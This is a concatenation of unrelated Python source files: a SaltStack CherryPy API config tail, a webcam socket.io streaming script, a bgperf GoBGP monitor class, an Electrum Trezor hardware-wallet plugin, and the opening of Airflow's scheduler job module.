            conf['/favicon.ico'] = {
                'tools.staticfile.on': True,
                'tools.staticfile.filename': self.apiopts['favicon'],
            }

        # Production mode unless debug was explicitly enabled.
        if self.apiopts.get('debug', False) is False:
            conf['global']['environment'] = 'production'

        # Serve static media if the directory has been set in the configuration
        if 'static' in self.apiopts:
            conf[self.apiopts.get('static_path', '/static')] = {
                'tools.staticdir.on': True,
                'tools.staticdir.dir': self.apiopts['static'],
            }

        # Add to global config
        cherrypy.config.update(conf['global'])

        return conf
def get_app(opts):
    '''
    Returns a WSGI app and a configuration dictionary
    '''
    # Pull the rest_cherrypy sub-dict out of the master opts; the key is the
    # second-to-last component of this module's dotted name.
    netapi_opts = opts.get(__name__.rsplit('.', 2)[-2], {})

    # Stash both option dicts in CherryPy's global config so the handler
    # classes can reach them at construction time.
    cherrypy.config['saltopts'] = opts
    cherrypy.config['apiopts'] = netapi_opts

    app_root = API()  # cherrypy app
    return app_root, netapi_opts, app_root.get_conf()
|
camera.py | import cv2
import base64
from socketIO_client import SocketIO, BaseNamespace
import numpy as np
import time
from PIL import Image
from threading import Thread, ThreadError
import io
img_np = None
socketIO = SocketIO('localhost',5000)
live_namespace = socketIO.define(BaseNamespace, '/live')
def receive_events_thread():
    # Block forever servicing the socket.io connection; meant to run on a
    # daemon thread so callbacks (e.g. on_camera_response) keep firing.
    socketIO.wait()
def on_camera_response(*args):
    """Handle a 'camera_update' event: decode the base64 image payload in
    args[0]['data'] into a numpy array and publish it via the img_np global."""
    global img_np
    img_bytes = base64.b64decode(args[0]['data'])
    img_np = np.array(Image.open(io.BytesIO(img_bytes)))
def run_cam():
    """Continuously display the most recently received frame (img_np) in an
    OpenCV window until the user presses 'q'.

    Fixes over the original: the bare ``except: continue`` swallowed
    KeyboardInterrupt/SystemExit and busy-spun at 100% CPU until the first
    frame arrived; now we wait politely for a frame and only swallow cv2
    display errors (e.g. a frame replaced mid-display).
    """
    global img_np
    while True:
        if img_np is None:
            # No frame received from the socket yet; don't busy-spin.
            time.sleep(0.01)
            continue
        try:
            cv2.imshow('cam', img_np)
            if cv2.waitKey(30) & 0xFF == ord('q'):
                break
        except cv2.error:
            # Transient display/encode error on this frame; skip it.
            continue
# Wire up the incoming-frame handler and start the background threads:
# one to service socket.io events, one to display received frames.
live_namespace.on('camera_update', on_camera_response)
# NOTE: this rebinds the name 'receive_events_thread' from the function to
# the Thread object wrapping it.
receive_events_thread = Thread(target = receive_events_thread)
receive_cam_thread = Thread(target = run_cam)
receive_events_thread.daemon = True
receive_events_thread.start()
receive_cam_thread.daemon = True
receive_cam_thread.start()

# Main loop: grab frames from the default camera, convert BGR->RGB,
# JPEG-encode, base64-encode and emit over the 'livevideo' event (~20 fps).
cap = cv2.VideoCapture(0)
while True:
    ret, img = cap.read()
    # imencode returns (ok, buffer); index [1] is the encoded byte buffer.
    img_b = cv2.imencode('.jpg', cv2.cvtColor(img, cv2.COLOR_BGR2RGB))[
        1
    ].tobytes()
    base64_bytes = base64.b64encode(img_b)
    base64_string = base64_bytes.decode('utf-8')
    live_namespace.emit('livevideo', {'data': base64_string})
    time.sleep(0.05)
|
monitor.py | # Copyright (C) 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gobgp import GoBGP
import os
from settings import dckr
import yaml
import json
from threading import Thread
import time
class Monitor(GoBGP):
    """GoBGP-based monitor container that peers with the test target and
    reports per-second neighbor statistics."""

    # Fixed docker container name for the single monitor instance.
    CONTAINER_NAME = 'bgperf_monitor'

    def run(self, conf, dckr_net_name=''):
        # Start the container, then write a gobgpd config that peers the
        # monitor with the target under test.
        # NOTE(review): super(GoBGP, self) intentionally(?) bypasses GoBGP.run
        # so this class can write its own config below -- confirm against the
        # GoBGP base class.
        ctn = super(GoBGP, self).run(dckr_net_name)

        config = {}
        config['global'] = {
            'config': {
                'as': conf['monitor']['as'],
                'router-id': conf['monitor']['router-id'],
            },
        }
        # Single neighbor: the target, with a 10s connect-retry timer.
        config['neighbors'] = [{'config': {'neighbor-address': conf['target']['local-address'],
                                           'peer-as': conf['target']['as']},
                                'transport': {'config': {'local-address': conf['monitor']['local-address']}},
                                'timers': {'config': {'connect-retry': 10}}}]

        with open('{0}/{1}'.format(self.host_dir, 'gobgpd.conf'), 'w') as f:
            f.write(yaml.dump(config))
        self.config_name = 'gobgpd.conf'

        # Startup script executed inside the container. Placeholder {0}
        # (local-address) is unused by the template; gobgpd logs into the
        # shared guest directory.
        startup = '''#!/bin/bash
ulimit -n 65536
gobgpd -t yaml -f {1}/{2} -l {3} > {1}/gobgpd.log 2>&1
'''.format(conf['monitor']['local-address'], self.guest_dir, self.config_name, 'info')
        filename = '{0}/start.sh'.format(self.host_dir)
        with open(filename, 'w') as f:
            f.write(startup)
        os.chmod(filename, 0777)  # Python 2 octal literal: rwxrwxrwx
        i = dckr.exec_create(container=self.name, cmd='{0}/start.sh'.format(self.guest_dir))
        dckr.exec_start(i['Id'], detach=True, socket=True)
        self.config = conf
        return ctn

    def wait_established(self, neighbor):
        # Poll gobgp inside the container (1s interval) until the BGP session
        # with *neighbor* reaches the 'established' state.
        while True:
            neigh = json.loads(self.local('gobgp neighbor {0} -j'.format(neighbor)))
            if neigh['state']['session-state'] == 'established':
                return
            time.sleep(1)

    def stats(self, queue):
        # Start a daemon thread that pushes one stats sample per second onto
        # *queue*.
        def stats():
            # Optional, ordered list of accepted-route counts to tick off.
            cps = self.config['monitor']['check-points'] if 'check-points' in self.config['monitor'] else []
            while True:
                info = json.loads(self.local('gobgp neighbor -j'))[0]
                info['who'] = self.name
                state = info['state']
                # Mark 'checked' when the accepted-route count exactly hits
                # the next pending check-point, then consume that check-point.
                if 'adj-table' in state and 'accepted' in state['adj-table'] and len(cps) > 0 and int(cps[0]) == int(state['adj-table']['accepted']):
                    cps.pop(0)
                    info['checked'] = True
                else:
                    info['checked'] = False
                queue.put(info)
                time.sleep(1)
        t = Thread(target=stats)
        t.daemon = True
        t.start()
|
trezor.py | from binascii import hexlify, unhexlify
from electrum_stak.util import bfh, bh2u, versiontuple
from electrum_stak.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT)
from electrum_stak import constants
from electrum_stak.i18n import _
from electrum_stak.plugins import BasePlugin, Device
from electrum_stak.transaction import deserialize, Transaction
from electrum_stak.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
    hw_type = 'trezor'
    device = 'TREZOR'

    def get_derivation(self):
        """Return the BIP32 derivation prefix configured for this keystore."""
        return self.derivation

    def get_script_gen(self):
        """Map the derivation prefix to the script generation in use
        (BIP84 -> native segwit, BIP49 -> p2sh segwit, otherwise legacy)."""
        prefix = self.derivation
        if prefix.startswith("m/84'/"):
            return SCRIPT_GEN_NATIVE_SEGWIT
        if prefix.startswith("m/49'/"):
            return SCRIPT_GEN_P2SH_SEGWIT
        return SCRIPT_GEN_LEGACY

    def get_client(self, force_pair=True):
        """Obtain (and optionally pair) the hardware client via the plugin."""
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        """Message decryption is not available on this device."""
        raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* with the key at derivation suffix *sequence*
        (a (change, index) pair) and return the raw signature bytes."""
        client = self.get_client()
        change, index = sequence
        full_path = "{}/{:d}/{:d}".format(self.get_derivation(), change, index)
        result = client.sign_message(
            self.plugin.get_coin_name(), client.expand_path(full_path), message)
        return result.signature

    def sign_transaction(self, tx, password):
        """Gather previous transactions and this keystore's xpub paths, then
        hand the actual signing off to the plugin."""
        if tx.is_complete():
            return

        prev_tx = {}    # prevout txid -> previous transaction
        xpub_path = {}  # xpub owned by this keystore -> derivation prefix
        master_xpub = self.get_master_public_key()

        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            # Legacy inputs need the full previous transaction on-device.
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[txin['prevout_hash']] = txin['prev_tx']

            for x_pubkey in x_pubkeys:
                if is_xpubkey(x_pubkey):
                    xpub, suffix = parse_xpubkey(x_pubkey)
                    if xpub == master_xpub:
                        xpub_path[xpub] = self.get_derivation()

        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    #     libraries_available, libraries_URL, minimum_firmware,
    #     wallet_class, ckd_public, types

    firmware_URL = 'https://wallet.trezor.io'
    libraries_URL = 'https://github.com/trezor/python-trezor'
    minimum_firmware = (1, 5, 2)
    keystore_class = TrezorKeyStore
    minimum_library = (0, 9, 0)

    # Maximum device-label length accepted when initializing the device.
    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        # Probe for a usable python-trezor install; on failure mark the
        # plugin unavailable rather than raising, so the wallet still loads.
        HW_PluginBase.__init__(self, parent, config, name)

        try:
            # Minimal test if python-trezor is installed
            import trezorlib
            try:
                library_version = trezorlib.__version__
            except AttributeError:
                # python-trezor only introduced __version__ in 0.9.0
                library_version = 'unknown'
            if library_version == 'unknown' or \
                    versiontuple(library_version) < self.minimum_library:
                self.libraries_available_message = (
                        _("Library version for '{}' is too old.").format(name)
                        + '\nInstalled: {}, Needed: {}'
                        .format(library_version, self.minimum_library))
                self.print_stderr(self.libraries_available_message)
                raise ImportError()
            self.libraries_available = True
        except ImportError:
            self.libraries_available = False
            return

        from . import client
        from . import transport
        import trezorlib.ckd_public
        import trezorlib.messages
        self.client_class = client.TrezorClient
        self.ckd_public = trezorlib.ckd_public
        self.types = trezorlib.messages
        self.DEVICE_IDS = ('TREZOR',)

        self.transport_handler = transport.TrezorTransport()
        self.device_manager().register_enumerate_func(self.enumerate)

    def enumerate(self):
        # Report connected devices to the device manager as generic Device
        # tuples keyed by transport path.
        devices = self.transport_handler.enumerate_devices()
        return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]

    def create_client(self, device, handler):
        # Open a transport to *device* and wrap it in a client.  Returns None
        # on any connection, ping or firmware-version failure so the device
        # manager can retry later.
        try:
            self.print_error("connecting to device at", device.path)
            transport = self.transport_handler.get_transport(device.path)
        except BaseException as e:
            self.print_error("cannot connect at", device.path, str(e))
            return None

        if not transport:
            self.print_error("cannot connect at", device.path)
            return

        self.print_error("connected to device at", device.path)

        client = self.client_class(transport, handler, self)

        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None

        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            handler.show_error(msg)
            return None

        return client

    def get_client(self, keystore, force_pair=True):
        # Resolve the paired client for *keystore* under the HID lock.
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client

    def get_coin_name(self):
        # Coin name passed to the firmware for address/tx operations.
        return "Testnet" if constants.net.TESTNET else "STRAKS"

    def initialize_device(self, device_id, wizard, handler):
        # Initialization method
        msg = _("Choose how you want to initialize your {}.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your {}, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
        ).format(self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
            (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
            (TIM_PRIVKEY, _("Upload a master private key"))
        ]
        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, self.device)
            # Run the device initialization on a background thread so the
            # wizard event loop started below stays responsive.
            t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            wizard.loop.exec_()
        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)

    def _initialize_device(self, settings, method, device_id, wizard, handler):
        # Perform the chosen initialization on the device; runs on a worker
        # thread started by initialize_device().
        item, label, pin_protection, passphrase_protection = settings

        if method == TIM_RECOVER:
            # FIXME the PIN prompt will appear over this message
            # which makes this unreadable
            handler.show_error(_(
                "You will be asked to enter 24 words regardless of your "
                "seed's actual length. If you enter a word incorrectly or "
                "misspell it, you cannot change it or go back - you will need "
                "to start again from the beginning.\n\nSo please enter "
                "the words carefully!"))

        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)

        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            u2f_counter = 0
            skip_backup = False
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language,
                                u2f_counter, skip_backup)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language)
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)
        # Resume the wizard event loop blocked in initialize_device().
        wizard.loop.exit(0)

    def setup_device(self, device_info, wizard, purpose):
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        client.get_xpub('m', 'standard')
        client.used()

    def get_xpub(self, device_id, derivation, xtype, wizard):
        # Fetch the xpub at *derivation* from the device identified by
        # *device_id*, using the wizard as the interaction handler.
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub

    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        # Stash lookup tables consumed by get_tx(), which the trezor library
        # calls back into during signing.
        self.prev_tx = prev_tx
        self.xpub_path = xpub_path
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
        outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
        signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
        raw = bh2u(signed_tx)
        tx.update_signatures(raw)

    def show_address(self, wallet, keystore, address):
        # Display *address* on the device screen for user verification.
        client = self.get_client(keystore)
        if not client.atleast_version(1, 3):
            keystore.handler.show_error(_("Your device firmware is too old"))
            return
        change, index = wallet.get_address_index(address)
        derivation = keystore.derivation
        address_path = "%s/%d/%d"%(derivation, change, index)
        address_n = client.expand_path(address_path)
        xpubs = wallet.get_master_public_keys()
        if len(xpubs) == 1:
            # Single-sig: script type follows the keystore's script gen.
            script_gen = keystore.get_script_gen()
            if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                script_type = self.types.InputScriptType.SPENDWITNESS
            elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                script_type = self.types.InputScriptType.SPENDP2SHWITNESS
            else:
                script_type = self.types.InputScriptType.SPENDADDRESS
            client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
        else:
            # Multisig: rebuild the redeem script description from all
            # cosigner xpubs at this (change, index) position.
            def f(xpub):
                node = self.ckd_public.deserialize(xpub)
                return self.types.HDNodePathType(node=node, address_n=[change, index])
            pubkeys = wallet.get_public_keys(address)
            # sort xpubs using the order of pubkeys
            sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
            pubkeys = list(map(f, sorted_xpubs))
            multisig = self.types.MultisigRedeemScriptType(
                pubkeys=pubkeys,
                signatures=[b''] * wallet.n,
                m=wallet.m,
            )
            client.get_address(self.get_coin_name(), address_n, True, multisig=multisig)

    def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
        # Convert electrum transaction inputs into trezor TxInputType
        # messages; for_sig=True additionally fills in derivation paths and
        # script/multisig metadata needed for signing.
        inputs = []
        for txin in tx.inputs():
            txinputtype = self.types.TxInputType()
            if txin['type'] == 'coinbase':
                prev_hash = "\0"*32
                prev_index = 0xffffffff  # signed int -1
            else:
                if for_sig:
                    x_pubkeys = txin['x_pubkeys']
                    if len(x_pubkeys) == 1:
                        # Single-sig input: extend with our derivation path.
                        x_pubkey = x_pubkeys[0]
                        xpub, s = parse_xpubkey(x_pubkey)
                        xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                        txinputtype._extend_address_n(xpub_n + s)
                        if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                            txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
                        elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                            txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
                        else:
                            txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
                    else:
                        # Multisig input: describe the full redeem script.
                        def f(x_pubkey):
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                            else:
                                xpub = xpub_from_pubkey(0, bfh(x_pubkey))
                                s = []
                            node = self.ckd_public.deserialize(xpub)
                            return self.types.HDNodePathType(node=node, address_n=s)
                        pubkeys = list(map(f, x_pubkeys))
                        multisig = self.types.MultisigRedeemScriptType(
                            pubkeys=pubkeys,
                            signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
                            m=txin.get('num_sig'),
                        )
                        if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                            script_type = self.types.InputScriptType.SPENDWITNESS
                        elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                            script_type = self.types.InputScriptType.SPENDP2SHWITNESS
                        else:
                            script_type = self.types.InputScriptType.SPENDMULTISIG
                        txinputtype = self.types.TxInputType(
                            script_type=script_type,
                            multisig=multisig
                        )
                        # find which key is mine
                        for x_pubkey in x_pubkeys:
                            if is_xpubkey(x_pubkey):
                                xpub, s = parse_xpubkey(x_pubkey)
                                if xpub in self.xpub_path:
                                    xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
                                    txinputtype._extend_address_n(xpub_n + s)
                                    break

                prev_hash = unhexlify(txin['prevout_hash'])
                prev_index = txin['prevout_n']

            if 'value' in txin:
                txinputtype.amount = txin['value']
            txinputtype.prev_hash = prev_hash
            txinputtype.prev_index = prev_index

            if 'scriptSig' in txin:
                script_sig = bfh(txin['scriptSig'])
                txinputtype.script_sig = script_sig

            txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)

            inputs.append(txinputtype)

        return inputs

    def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
        # Convert electrum outputs into trezor TxOutputType messages.  Change
        # outputs owned by this wallet are described by derivation so the
        # device can hide them from the confirmation screen.

        def create_output_by_derivation(info):
            # Output belongs to this wallet: describe it by derivation path
            # (single-sig) or by cosigner xpubs + path (multisig).
            index, xpubs, m = info
            if len(xpubs) == 1:
                if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOWITNESS
                elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
                else:
                    script_type = self.types.OutputScriptType.PAYTOADDRESS
                address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
                txoutputtype = self.types.TxOutputType(
                    amount=amount,
                    script_type=script_type,
                    address_n=address_n,
                )
            else:
                if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOWITNESS
                elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
                    script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
                else:
                    script_type = self.types.OutputScriptType.PAYTOMULTISIG
                address_n = self.client_class.expand_path("/%d/%d" % index)
                nodes = map(self.ckd_public.deserialize, xpubs)
                pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
                multisig = self.types.MultisigRedeemScriptType(
                    pubkeys=pubkeys,
                    signatures=[b''] * len(pubkeys),
                    m=m)
                txoutputtype = self.types.TxOutputType(
                    multisig=multisig,
                    amount=amount,
                    address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
                    script_type=script_type)
            return txoutputtype

        def create_output_by_address():
            # External output: plain address or OP_RETURN script.
            txoutputtype = self.types.TxOutputType()
            txoutputtype.amount = amount
            if _type == TYPE_SCRIPT:
                txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
                txoutputtype.op_return_data = address[2:]
            elif _type == TYPE_ADDRESS:
                txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
                txoutputtype.address = address
            return txoutputtype

        def is_any_output_on_change_branch():
            # True if any wallet-owned output derives from the change branch
            # (first path component == 1).
            for _type, address, amount in tx.outputs():
                info = tx.output_info.get(address)
                if info is not None:
                    index, xpubs, m = info
                    if index[0] == 1:
                        return True
            return False

        outputs = []
        has_change = False
        any_output_on_change_branch = is_any_output_on_change_branch()

        for _type, address, amount in tx.outputs():
            use_create_by_derivation = False
            info = tx.output_info.get(address)
            if info is not None and not has_change:
                index, xpubs, m = info
                on_change_branch = index[0] == 1
                # prioritise hiding outputs on the 'change' branch from user
                # because no more than one change address allowed
                # note: ^ restriction can be removed once we require fw
                # that has https://github.com/trezor/trezor-mcu/pull/306
                if on_change_branch == any_output_on_change_branch:
                    use_create_by_derivation = True
                    has_change = True
            if use_create_by_derivation:
                txoutputtype = create_output_by_derivation(info)
            else:
                txoutputtype = create_output_by_address()
            outputs.append(txoutputtype)

        return outputs

    def electrum_tx_to_txtype(self, tx):
        # Convert an electrum Transaction into a trezor TransactionType (used
        # for previous transactions referenced by legacy inputs).
        t = self.types.TransactionType()
        if tx is None:
            # probably for segwit input and we don't need this prev txn
            return t
        d = deserialize(tx.raw)
        t.version = d['version']
        t.lock_time = d['lockTime']
        inputs = self.tx_inputs(tx)
        t._extend_inputs(inputs)
        for vout in d['outputs']:
            o = t._add_bin_outputs()
            o.amount = vout['value']
            o.script_pubkey = bfh(vout['scriptPubKey'])
        return t

    # This function is called from the TREZOR libraries (via tx_api)
    def get_tx(self, tx_hash):
        # Serve a previous transaction from the table stashed by
        # sign_transaction().
        tx = self.prev_tx[tx_hash]
        return self.electrum_tx_to_txtype(tx)
|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import sched
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
# Short aliases for the ORM models used throughout the scheduler.
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
    """Runs DAG processing in a separate process using DagFileProcessor

    :param file_path: a Python file containing Airflow DAG definitions
    :type file_path: str
    :param pickle_dags: whether to serialize the DAG objects to the DB
    :type pickle_dags: bool
    :param dag_ids: If specified, only look at these DAG ID's
    :type dag_ids: List[str]
    :param callback_requests: failure callback to execute
    :type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
    """

    # Counter that increments every time an instance of this class is created
    class_creation_counter = 0

    def __init__(
        self,
        file_path: str,
        pickle_dags: bool,
        dag_ids: Optional[List[str]],
        callback_requests: List[CallbackRequest],
    ):
        super().__init__()
        self._file_path = file_path
        self._pickle_dags = pickle_dags
        self._dag_ids = dag_ids
        self._callback_requests = callback_requests

        # The process that was launched to process the given file path.
        self._process: Optional[multiprocessing.process.BaseProcess] = None
        # The result of DagFileProcessor.process_file(file_path).
        self._result: Optional[Tuple[int, int]] = None
        # Whether the process is done running.
        self._done = False
        # When the process started.
        self._start_time: Optional[datetime.datetime] = None
        # This ID is use to uniquely name the process / thread that's launched
        # by this processor instance
        self._instance_id = DagFileProcessorProcess.class_creation_counter
        # Parent end of the result pipe; populated by start() only after the
        # child process has been launched.
        self._parent_channel: Optional[MultiprocessingConnection] = None
        DagFileProcessorProcess.class_creation_counter += 1

    @property
    def file_path(self) -> str:
        """Path of the DAG definition file this processor parses."""
        return self._file_path

    @staticmethod
    def _run_file_processor(
        result_channel: MultiprocessingConnection,
        parent_channel: MultiprocessingConnection,
        file_path: str,
        pickle_dags: bool,
        dag_ids: Optional[List[str]],
        thread_name: str,
        callback_requests: List[CallbackRequest],
    ) -> None:
        """
        Process the given file.

        :param result_channel: the connection to use for passing back the result
        :type result_channel: multiprocessing.Connection
        :param parent_channel: the parent end of the channel to close in the child
        :type parent_channel: multiprocessing.Connection
        :param file_path: the file to process
        :type file_path: str
        :param pickle_dags: whether to pickle the DAGs found in the file and
            save them to the DB
        :type pickle_dags: bool
        :param dag_ids: if specified, only examine DAG ID's that are
            in this list
        :type dag_ids: list[str]
        :param thread_name: the name to use for the process that is launched
        :type thread_name: str
        :param callback_requests: failure callback to execute
        :type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
        :return: the process that was launched
        :rtype: multiprocessing.Process
        """
        # This helper runs in the newly created process
        log: logging.Logger = logging.getLogger("airflow.processor")

        # Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
        # the child, else it won't get closed properly until we exit.
        log.info("Closing parent pipe")
        parent_channel.close()
        del parent_channel

        set_context(log, file_path)
        setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")

        try:
            # redirect stdout/stderr to log
            with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
                StreamLogWriter(log, logging.WARN)
            ), Stats.timer() as timer:
                # Re-configure the ORM engine as there are issues with multiple processes
                settings.configure_orm()

                # Change the thread name to differentiate log lines. This is
                # really a separate process, but changing the name of the
                # process doesn't work, so changing the thread name instead.
                threading.current_thread().name = thread_name

                log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
                dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
                result: Tuple[int, int] = dag_file_processor.process_file(
                    file_path=file_path,
                    pickle_dags=pickle_dags,
                    callback_requests=callback_requests,
                )
                # Ship the (dag count, import error count) tuple back to the parent.
                result_channel.send(result)
            log.info("Processing %s took %.3f seconds", file_path, timer.duration)
        except Exception:  # pylint: disable=broad-except
            # Log exceptions through the logging framework.
            log.exception("Got an exception! Propagating...")
            raise
        finally:
            # We re-initialized the ORM within this Process above so we need to
            # tear it down manually here
            settings.dispose_orm()

            # Closing the channel is what signals EOF to the parent's `done` poll.
            result_channel.close()

    def start(self) -> None:
        """Launch the process and start processing the DAG."""
        start_method = self._get_multiprocessing_start_method()
        context = multiprocessing.get_context(start_method)

